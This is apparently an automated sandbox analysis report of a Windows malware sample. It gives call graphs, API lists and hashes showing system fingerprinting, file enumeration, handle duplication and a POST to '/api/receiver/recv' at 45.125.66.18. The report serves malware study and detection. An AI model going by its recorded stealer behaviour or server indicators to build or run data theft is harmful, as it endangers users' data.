RtlAllocateHeap 2698->2722 2699->2698 2701 19112d 2700->2701 2707 1912e2 2700->2707 2702 191189 2701->2702 2706 1911b0 2701->2706 2727 1936d0 2702->2727 2704 1911a8 2705 191ee0 RtlFreeHeap 2704->2705 2705->2707 2706->2704 2711 19120e 2706->2711 2723 1990b0 2706->2723 2707->2675 2709 1936d0 7 API calls 2710 1912a2 2709->2710 2710->2704 2712 1912c8 DeleteFileW 2710->2712 2711->2704 2711->2709 2712->2704 2714 19139d 2713->2714 2720 1913e0 2713->2720 2715 19140a 2714->2715 2716 1913d5 2714->2716 2809 191ec0 RtlSizeHeap 2715->2809 2810 191ea0 RtlAllocateHeap 2716->2810 2719 191415 2719->2720 2721 192060 2 API calls 2719->2721 2720->2675 2721->2720 2722->2698 2724 1990c8 2723->2724 2725 1990e0 2724->2725 2742 192200 2724->2742 2725->2711 2728 1936ee 2727->2728 2747 198b90 GetCurrentHwProfileA 2728->2747 2730 193702 2749 1938c0 2730->2749 2733 19379b 2733->2704 2734 1937fa 2737 1937ef 2734->2737 2782 191ea0 RtlAllocateHeap 2734->2782 2735 1937b4 2767 1934a0 2735->2767 2738 191ee0 RtlFreeHeap 2737->2738 2738->2733 2740 193820 2740->2737 2741 192b10 3 API calls 2740->2741 2741->2737 2743 19220f 2742->2743 2746 191ea0 RtlAllocateHeap 2743->2746 2745 192223 2745->2725 2746->2745 2748 198baa 2747->2748 2748->2730 2750 1938f8 2749->2750 2758 193791 2749->2758 2750->2758 2783 198f20 2750->2783 2752 193934 2753 193940 2752->2753 2754 193953 2752->2754 2756 191ee0 RtlFreeHeap 2753->2756 2792 191ea0 RtlAllocateHeap 2754->2792 2756->2758 2757 193965 2793 197d10 2757->2793 2758->2733 2758->2734 2758->2735 2760 1939a0 2761 1939de 2760->2761 2763 1939ae 2760->2763 2764 191ee0 RtlFreeHeap 2761->2764 2762 193972 2762->2760 2797 1980d0 2762->2797 2766 191ee0 RtlFreeHeap 2763->2766 2764->2758 2766->2758 2768 193548 2767->2768 2769 1934ba 2767->2769 2801 191ec0 RtlSizeHeap 2768->2801 2800 191ea0 RtlAllocateHeap 2769->2800 2772 193573 2773 1935a1 2772->2773 2774 193614 2772->2774 2775 1935bf 2773->2775 2776 192b10 3 API calls 2773->2776 2802 191ec0 RtlSizeHeap 2774->2802 2777 1934a0 5 API calls 2775->2777 2776->2775 2781 1934cc 2777->2781 2779 193622 2779->2781 2803 192060 2779->2803 2781->2737 2782->2740 2784 192360 RtlAllocateHeap RtlFreeHeap 2783->2784 2786 198f4c 2784->2786 2785 1990a2 2785->2752 2786->2785 2787 199098 CloseHandle 2786->2787 2788 191ea0 RtlAllocateHeap 2786->2788 2787->2785 2789 19902d 2788->2789 2789->2787 2790 199082 2789->2790 2791 191ee0 RtlFreeHeap 2789->2791 2790->2787 2791->2790 2792->2757 2794 197d23 2793->2794 2796 197d29 2793->2796 2795 1989f0 RtlAllocateHeap 2794->2795 2794->2796 2795->2796 2796->2762 2798 198a50 RtlFreeHeap 2797->2798 2799 1980dc 2798->2799 2799->2760 2800->2781 2801->2772 2802->2779 2804 192069 2803->2804 2805 19206d 2803->2805 2804->2781 2806 192081 RtlReAllocateHeap 2805->2806 2807 192073 2805->2807 2806->2804 2808 191ea0 RtlAllocateHeap 2807->2808 2808->2804 2809->2719 2810->2720 2815 192a6f 2811->2815 2812 192b01 2816 191ea0 RtlAllocateHeap 2812->2816 2813 192af4 Sleep 2813->2815 2815->2812 2815->2813 2817 191ea0 RtlAllocateHeap 2815->2817 2816->2688 2817->2815 2819 193a3c 2818->2819 2820 198b90 GetCurrentHwProfileA 2819->2820 2821 193a50 2820->2821 2830 193b80 2821->2830 2825 193b60 2826 191ee0 RtlFreeHeap 2825->2826 2827 193b6c 2826->2827 2827->2661 2828 193ada 2828->2825 2829 192b10 3 API calls 2828->2829 2829->2825 2845 191ec0 RtlSizeHeap 2830->2845 2832 193b8f 2846 191ea0 RtlAllocateHeap 2832->2846 2834 193ba7 2835 197d10 RtlAllocateHeap 2834->2835 2838 193bb4 2835->2838 2836 193be2 2837 193c1c 2836->2837 2839 193bf0 2836->2839 2840 191ee0 RtlFreeHeap 2837->2840 2838->2836 2841 1980d0 RtlFreeHeap 2838->2841 2842 191ee0 RtlFreeHeap 2839->2842 2843 193ac8 2840->2843 2841->2836 2842->2843 2844 191ea0 RtlAllocateHeap 2843->2844 2844->2828 2845->2832 2846->2834 2858 191ea0 RtlAllocateHeap 2847->2858 2849 1933b3 LocalFree 2852 1933dd 2849->2852 2850 1933c2 2850->2852 2853 1933cd LocalAlloc 2850->2853 2851 1932b3 2854 198b90 GetCurrentHwProfileA 2851->2854 2857 1933a7 2851->2857 2852->2666 2853->2852 2855 1932ea 2854->2855 2856 192b10 3 API calls 2855->2856 2856->2857 2857->2849 2857->2850 2858->2851 2897 191ea0 RtlAllocateHeap 2859->2897 2861 19148e 2862 19149b NtQuerySystemInformation 2861->2862 2863 192060 2 API calls 2861->2863 2862->2861 2869 1914d3 2862->2869 2863->2861 2864 1915fa 2865 191ee0 RtlFreeHeap 2864->2865 2868 191603 2865->2868 2866 191512 OpenProcess 2866->2869 2867 1915f5 2867->2522 2868->2522 2869->2864 2869->2866 2869->2867 2870 19153a GetCurrentProcess DuplicateHandle 2869->2870 2871 1915eb FindCloseChangeNotification 2870->2871 2872 19156f 2870->2872 2871->2867 2872->2871 2873 19157b GetFileType 2872->2873 2873->2871 2874 19158a 2873->2874 2874->2871 2875 19159a CloseHandle GetCurrentProcess DuplicateHandle 2874->2875 2875->2871 2876 1915d2 2875->2876 2876->2871 2877 1915d8 CloseHandle 2876->2877 2877->2871 2878->2524 2880 1931c5 2879->2880 2898 198d00 GetUserDefaultUILanguage 2880->2898 2882 193233 2899 198c00 EnumDisplayDevicesA 2882->2899 2884 19324b 2885 198b90 GetCurrentHwProfileA 2884->2885 2886 193259 2885->2886 2901 198cc0 GetPhysicallyInstalledSystemMemory 2886->2901 2888 193265 2903 198ca0 GetSystemInfo 2888->2903 2890 193271 2904 198c50 GetKeyboardLayoutList 2890->2904 2892 19327d 2905 198c70 KiUserCallbackDispatcher GetSystemMetrics 2892->2905 2894 193289 2906 198d20 GetModuleFileNameW 2894->2906 2896 193295 2896->2529 2897->2861 2898->2882 2900 198c2a 2899->2900 2900->2884 2902 198cd4 __aulldiv 2901->2902 2902->2888 2903->2890 2904->2892 2905->2894 2906->2896 2907->2534 2909 1929ec 2908->2909 2910 192a25 2909->2910 2911 192a17 TerminateThread 2909->2911 2912 192a3d 2910->2912 2913 192a2e TerminateThread 2910->2913 2911->2910 2912->2540 2913->2912 2915 1943e0 3 API calls 2914->2915 2916 191c94 2915->2916 2917 191e80 HeapDestroy 2916->2917 2917->2544 2918 192bd0 2919 192c09 2918->2919 2925 192bf8 2918->2925 2920 192cd5 2919->2920 2928 192c16 2919->2928 2921 192d29 2920->2921 2922 192d08 2920->2922 2920->2925 2923 192060 2 API calls 2921->2923 2924 191ee0 RtlFreeHeap 2922->2924 2923->2925 2924->2925 2926 192c88 2926->2925 2927 192c94 ExitProcess 2926->2927 2928->2925 2928->2926 2929 192c9e 2928->2929 2929->2925 2930 192cbc ExitProcess 2929->2930 2941 1925e3 2943 1925eb 2941->2943 2942 19260d 2943->2942 2944 192629 2943->2944 2945 1926ba 2943->2945 2964 191ea0 RtlAllocateHeap 2944->2964 2946 19275d 2945->2946 2947 1926cc 2945->2947 2949 192692 2946->2949 2966 191ea0 RtlAllocateHeap 2946->2966 2965 191ea0 RtlAllocateHeap 2947->2965 2949->2949 2952 192648 2954 191060 12 API calls 2952->2954 2953 1926eb 2957 1912f0 12 API calls 2953->2957 2956 192686 2954->2956 2955 19278e 2959 191000 7 API calls 2955->2959 2958 191ee0 RtlFreeHeap 2956->2958 2960 192729 2957->2960 2958->2949 2961 1927cc 2959->2961 2962 191ee0 RtlFreeHeap 2960->2962 2963 191ee0 RtlFreeHeap 2961->2963 2962->2949 2963->2949 2964->2952 2965->2953 2966->2955 2935 191897 2936 191845 2935->2936 2938 19188c 2936->2938 2939 1918a2 GlobalHandle 2936->2939 2937 1918e8 2938->2937 2940 1919f7 LoadLibraryA GetProcAddress 2938->2940 2939->2936 2940->2937

    Control-flow Graph

    APIs
      • Part of subcall function 00191EA0: RtlAllocateHeap.NTDLL(02590000,00000008,00193D82), ref: 00191EB0
    • NtQuerySystemInformation.NTDLL(00000010,?,00001000,00000000), ref: 001914A9
    • OpenProcess.KERNEL32(00000040,00000000,?), ref: 00191523
    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0019154B
    • DuplicateHandle.KERNELBASE(000000FF,?,00000000), ref: 00191565
    • GetFileType.KERNELBASE(000000FF), ref: 0019157F
    • CloseHandle.KERNEL32(000000FF), ref: 0019159E
    • GetCurrentProcess.KERNEL32(000000FF,00000000,00000000,00000001), ref: 001915AE
    • DuplicateHandle.KERNEL32(000000FF,?,00000000), ref: 001915C8
    • CloseHandle.KERNEL32(000000FF), ref: 001915DC
    • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 001915EF
      • Part of subcall function 00191EE0: RtlFreeHeap.NTDLL(02590000,00000000,00000000,009C0000), ref: 00191EFE
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: Handle$CloseProcess$CurrentDuplicateHeap$AllocateChangeFileFindFreeInformationNotificationOpenQuerySystemType
    • String ID:
    • API String ID: 2769610337-0
    • Opcode ID: a667840d9a4539fabcca1c960dcc61729685a7f37f919adb6953b9a06dbe3e49
    • Instruction ID: 0d136b9f20b68a9a394dfaa30cc83b27ff18731bf8278e1f5ee0dcf5aa73cb80
    • Opcode Fuzzy Hash: a667840d9a4539fabcca1c960dcc61729685a7f37f919adb6953b9a06dbe3e49
    • Instruction Fuzzy Hash: 355153B4D0020AFFDF14CFD8D984BAEB7B5BF48305F158259E612A7280D734AA85CB91

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 75 198d40-198d5d call 191ea0 78 198d63-198da6 call 192360 FindFirstFileW call 192250 75->78 79 198ed5-198ed8 75->79 84 198ec9-198ed2 call 191ee0 78->84 85 198dac-198dd1 call 192250 * 2 78->85 84->79 92 198de8-198dec 85->92 93 198dd3-198de6 85->93 95 198e1d-198e47 call 192360 92->95 96 198dee-198e01 92->96 93->92 94 198e18 93->94 98 198ea6-198eb9 FindNextFileW 94->98 109 198e48 call 191110 95->109 110 198e48 call 191380 95->110 96->95 97 198e03-198e16 96->97 97->94 97->95 98->85 100 198ebf-198ec3 FindClose 98->100 100->84 102 198e4b-198e54 103 198e9a-198ea2 102->103 104 198e56-198e5c 102->104 103->98 104->103 105 198e5e-198e68 104->105 105->103 106 198e6a-198e89 call 198d40 105->106 108 198e8e-198e97 106->108 108->103 109->102 110->102
    APIs
      • Part of subcall function 00191EA0: RtlAllocateHeap.NTDLL(02590000,00000008,00193D82), ref: 00191EB0
    • FindFirstFileW.KERNELBASE(00000000,?), ref: 00198D83
    • FindNextFileW.KERNELBASE(000000FF,?), ref: 00198EB1
    • FindClose.KERNEL32(000000FF), ref: 00198EC3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: Find$File$AllocateCloseFirstHeapNext
    • String ID: %s\%s$%s\*
    • API String ID: 2963102669-2848263008
    • Opcode ID: 50f429fd5c00bef8b35697c12d38414090c3928e8657d90d2d7982637db81069
    • Instruction ID: 1c491e64ff413298b4a98f6dd5121dc38a1220311df394be294a91777e8cae40
    • Opcode Fuzzy Hash: 50f429fd5c00bef8b35697c12d38414090c3928e8657d90d2d7982637db81069
    • Instruction Fuzzy Hash: D141EDB5E00218ABCF14DFA8D9A5AEF77B5AF59300F1485A8F90597281EB34AB40CB50

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 111 1917e0-191843 112 19184e-191857 111->112 113 191845-19184b 111->113 114 19185d-19188a call 192130 call 1990f0 112->114 115 1918e2-1918e6 112->115 113->112 127 191899-1918a0 114->127 128 19188c-191895 114->128 116 1918e8-1918ea 115->116 117 1918ef-191916 115->117 120 191a19-191a1c 116->120 121 19191c-191925 117->121 122 191a16 117->122 121->122 124 19192b-191931 121->124 122->120 126 191938-191944 124->126 129 191960-1919c9 126->129 130 191946-19195e 126->130 131 1918cb-1918dd 127->131 132 1918a2-1918c8 GlobalHandle 127->132 128->115 133 1919cb-1919dc 129->133 134 1919f7-191a12 LoadLibraryA GetProcAddress 129->134 130->126 131->113 132->131 135 1919de-1919ef 133->135 136 1919f1-1919f4 133->136 134->120 135->133 136->134
    APIs
    • GlobalHandle.KERNEL32(00000000), ref: 001918C8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: GlobalHandle
    • String ID: l
    • API String ID: 1075865800-2517025534
    • Opcode ID: e3975b31335fedd46d34115aca8a69f79438400aaa77e8c82c8e3974630c03b1
    • Instruction ID: a1617e16d1fb0ad4456cb9066c77e2625da379653a6284c83116c101cd86ebc2
    • Opcode Fuzzy Hash: e3975b31335fedd46d34115aca8a69f79438400aaa77e8c82c8e3974630c03b1
    • Instruction Fuzzy Hash: FF919374E05249EFCF08CF98D590AADBBB2FF48308F248199D915AB345D730AA91DF94
    APIs
    • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,00193271,00193147), ref: 00198CAA
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: InfoSystem
    • String ID:
    • API String ID: 31276548-0
    • Opcode ID: 8dafc0fd3e50f440229e4450dcd0c3b7b59951f1e94a4ea218124536a1c2a8d3
    • Instruction ID: cd79f90f5b27da9de2163c091ea039fe00ad13085a2218df904306e926b814dd
    • Opcode Fuzzy Hash: 8dafc0fd3e50f440229e4450dcd0c3b7b59951f1e94a4ea218124536a1c2a8d3
    • Instruction Fuzzy Hash: 62D0A97490020C8BCB00DF90C84889AB7FDAF48200F0081A5EC4847300EA32A9568BD1
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: cbae8bdaf470c6a5cd34aafb2b40ce8b47aa4a6b33389a633a39b64f225c1ae7
    • Instruction ID: 2a7688bb57c4dc14c89101ff728fafd3c80fbf3e08f1858384674206c9b23770
    • Opcode Fuzzy Hash: cbae8bdaf470c6a5cd34aafb2b40ce8b47aa4a6b33389a633a39b64f225c1ae7
    • Instruction Fuzzy Hash: 90412630A08205EBDF14CFA4E991B69B7B6EB85304F2481A9E5114F7D9D736DF82CB50

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 29 192810-192855 31 19285c-1928c1 29->31 32 192857 29->32 39 1928c3 31->39 40 1928c5-1928e7 CreateThread 31->40 33 19291a 32->33 34 19291c-19291f 33->34 39->33 41 1928e9 40->41 42 1928eb-19290f CreateThread 40->42 41->33 43 192911 42->43 44 192913-192918 42->44 43->33 44->34
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID:
    • String ID: 0u$0u0u$0u0u$45.125.66.18$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.4$`
    • API String ID: 0-2265949662
    • Opcode ID: dbfcf35f5a5ee36c41404830a31fbd680e3191060b4ae51d94db979815185901
    • Instruction ID: d1753ada8403b3e3380677d5f56de6a9bcfa11c100310a18dd4613d770205be7
    • Opcode Fuzzy Hash: dbfcf35f5a5ee36c41404830a31fbd680e3191060b4ae51d94db979815185901
    • Instruction Fuzzy Hash: 3D310874644308BFEB10CF50DC86FA97BA5BB08741F20C159FA099F2D1C3B5AA85CB85

    Control-flow Graph

    APIs
    • CreateMutexA.KERNELBASE(00000000,00000000,082e2202-17f7-4654-a651-ac9a3778e1d7), ref: 00191D43
    • GetLastError.KERNEL32 ref: 00191D52
    • Sleep.KERNELBASE(00001388), ref: 00191E1C
    • CloseHandle.KERNEL32(00000000), ref: 00191E3A
    • ExitProcess.KERNEL32 ref: 00191E42
    Strings
    • 082e2202-17f7-4654-a651-ac9a3778e1d7, xrefs: 00191D3A
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: CloseCreateErrorExitHandleLastMutexProcessSleep
    • String ID: 082e2202-17f7-4654-a651-ac9a3778e1d7
    • API String ID: 168847217-1460249064
    • Opcode ID: fca84eac6b69e47a5d9baa8f70aeb7c1efe893e37b84fffa0d4beedc32acd9dc
    • Instruction ID: 299b476a326ce3eab44841a258c7527bf21058f3736dd15412114802dc7d4e04
    • Opcode Fuzzy Hash: fca84eac6b69e47a5d9baa8f70aeb7c1efe893e37b84fffa0d4beedc32acd9dc
    • Instruction Fuzzy Hash: 9131B6B1D0021AFBDF24EBA4D845BED77B5BF14700F144066F805B2581DB359AD4DBA2

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 137 192e60-192e66 138 192e6d-192e74 137->138 139 192e7a-192e80 138->139 140 1930af-1930b2 138->140 141 192e8e-192e97 139->141 142 192e9d-192ea9 141->142 143 19309f-1930aa Sleep 141->143 144 19309a 142->144 145 192eaf-192ebe 142->145 143->138 144->143 146 192ec0-192ecf 145->146 147 192ed5-192ef8 call 1991d0 145->147 146->144 146->147 150 192efa-192f0b call 192920 147->150 151 192f10-192f2c 147->151 157 192e82-192e8a 150->157 153 192fc3-192ff0 call 191ea0 151->153 154 192f32-192f4c 151->154 163 193009-193061 153->163 164 192ff2-192ffd 153->164 158 192f53-192f6e 154->158 157->141 160 192f70-192f82 158->160 161 192f87-192faa 158->161 160->157 161->153 166 192fac-192fb7 161->166 167 193068-19306f 163->167 164->163 166->153 168 193088-193093 167->168 169 193071-19307c 167->169 168->144 169->168
    APIs
    • Sleep.KERNELBASE(000003E8), ref: 001930A4
      • Part of subcall function 00191EA0: RtlAllocateHeap.NTDLL(02590000,00000008,00193D82), ref: 00191EB0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: AllocateHeapSleep
    • String ID: /api/receiver/recv$Content-Type: application/octet-stream$POST
    • API String ID: 4201116106-1595302217
    • Opcode ID: 54530706ed8a2d79dbefc79afbe743917a931af03a4e792ca7b0ee56a4a45d3d
    • Instruction ID: a0c18d364692d58c32c12bbf1849f6e3eb0edc89338cded800b960b0d120ddc3
    • Opcode Fuzzy Hash: 54530706ed8a2d79dbefc79afbe743917a931af03a4e792ca7b0ee56a4a45d3d
    • Instruction Fuzzy Hash: 8D7167B8A00219EBCB14CF84D584ABDBBB1FF48714F608198F9565B381D775EE81DB90

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 195 193ef0-193f10 VirtualAlloc 196 193f12-193f14 195->196 197 193f16-193f33 VirtualAlloc 195->197 198 193f61-193f62 196->198 199 193f39-193f56 VirtualAlloc 197->199 200 193f35-193f37 197->200 201 193f58-193f5a 199->201 202 193f5c 199->202 200->198 201->198 202->198
    APIs
    • VirtualAlloc.KERNELBASE(00000000,00000015,00003000,00000040,?,00193D5B,?,00191D86,?), ref: 00193EFE
    • VirtualAlloc.KERNELBASE(00000000,00000015,00003000,00000040,?,00193D5B,?,00191D86,?), ref: 00193F21
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 11e146ce3b3fc8aba9176f74902bc98f31fc8b6cbcbbecd3ead5fb1d5e853737
    • Instruction ID: 8510be32cfd70a93fe9decb5c7b829cccde207cb057648e2be1f3e43ddb5c41c
    • Opcode Fuzzy Hash: 11e146ce3b3fc8aba9176f74902bc98f31fc8b6cbcbbecd3ead5fb1d5e853737
    • Instruction Fuzzy Hash: C1F0D070A8E318EEEB645B71BEDEB1535B45308B16F100426B716AD5D0E3B452C09A1A

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 203 192bd0-192bf6 204 192c09-192c10 203->204 205 192bf8-192bfd 203->205 206 192cd5-192cdc 204->206 207 192c16-192c6b call 1991d0 204->207 208 192c04 205->208 210 192ce2-192d06 206->210 211 192d76-192d7d 206->211 229 192c6d-192c74 207->229 230 192cc4-192cc9 207->230 212 192da6-192da9 208->212 216 192d29-192d4c call 192060 210->216 217 192d08-192d0f 210->217 213 192d7f-192d83 211->213 214 192d93-192d9a 211->214 219 192d91 213->219 220 192d85-192d8a 213->220 214->212 221 192d9c-192d9f 214->221 227 192d4e-192d6d 216->227 228 192d74 216->228 222 192d1b-192d27 call 191ee0 217->222 223 192d11-192d14 217->223 219->212 220->219 221->212 222->228 223->222 227->228 228->212 232 192c88-192c92 229->232 233 192c76-192c7d 229->233 236 192cd0 230->236 234 192c9c 232->234 235 192c94-192c96 ExitProcess 232->235 233->232 237 192c7f-192c86 233->237 234->230 236->212 237->232 238 192c9e-192ca5 237->238 239 192cb0-192cba 238->239 240 192ca7-192cae 238->240 239->230 241 192cbc-192cbe ExitProcess 239->241 240->230 240->239
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: ExitProcess
    • String ID:
    • API String ID: 621844428-0
    • Opcode ID: 64861559b6c049f639723116096c04e50082244f46ca104e0174082016f35af9
    • Instruction ID: f61aecbff6d7ff2d41ffa2a2d216a0dfcce773b62692a8a826696d899dc56a7d
    • Opcode Fuzzy Hash: 64861559b6c049f639723116096c04e50082244f46ca104e0174082016f35af9
    • Instruction Fuzzy Hash: 9151F274A00209EFDF18CF94D998BAEB7B1BF48304F208199E9056B291C775EE85DF91

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 242 198cc0-198cd2 GetPhysicallyInstalledSystemMemory 243 198cf2-198cf5 242->243 244 198cd4-198ceb call 199260 242->244 244->243
    APIs
    • GetPhysicallyInstalledSystemMemory.KERNELBASE(00193265,00193265,00193147,?,?,?,?,?,?,?,?,?,00193147), ref: 00198CCA
    • __aulldiv.LIBCMT ref: 00198CE3
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: InstalledMemoryPhysicallySystem__aulldiv
    • String ID:
    • API String ID: 3833932492-0
    • Opcode ID: 4df88f184aa35fde41e30eed0d39220559dc2f7a53c7003a028c1c41d959b24c
    • Instruction ID: 88af7ab474bff0e88aefa0d72ceebf818fc3d6da14601d631ed60ad50751ae45
    • Opcode Fuzzy Hash: 4df88f184aa35fde41e30eed0d39220559dc2f7a53c7003a028c1c41d959b24c
    • Instruction Fuzzy Hash: C8E08C38604208B7CF00DFE0DC45B9A777CAB48700F0081A9B908A7280DF31AA01C7E5

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 247 198c70-198c96 KiUserCallbackDispatcher GetSystemMetrics
    APIs
    • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00198C75
    • GetSystemMetrics.USER32(00000001), ref: 00198C86
    Memory Dump Source
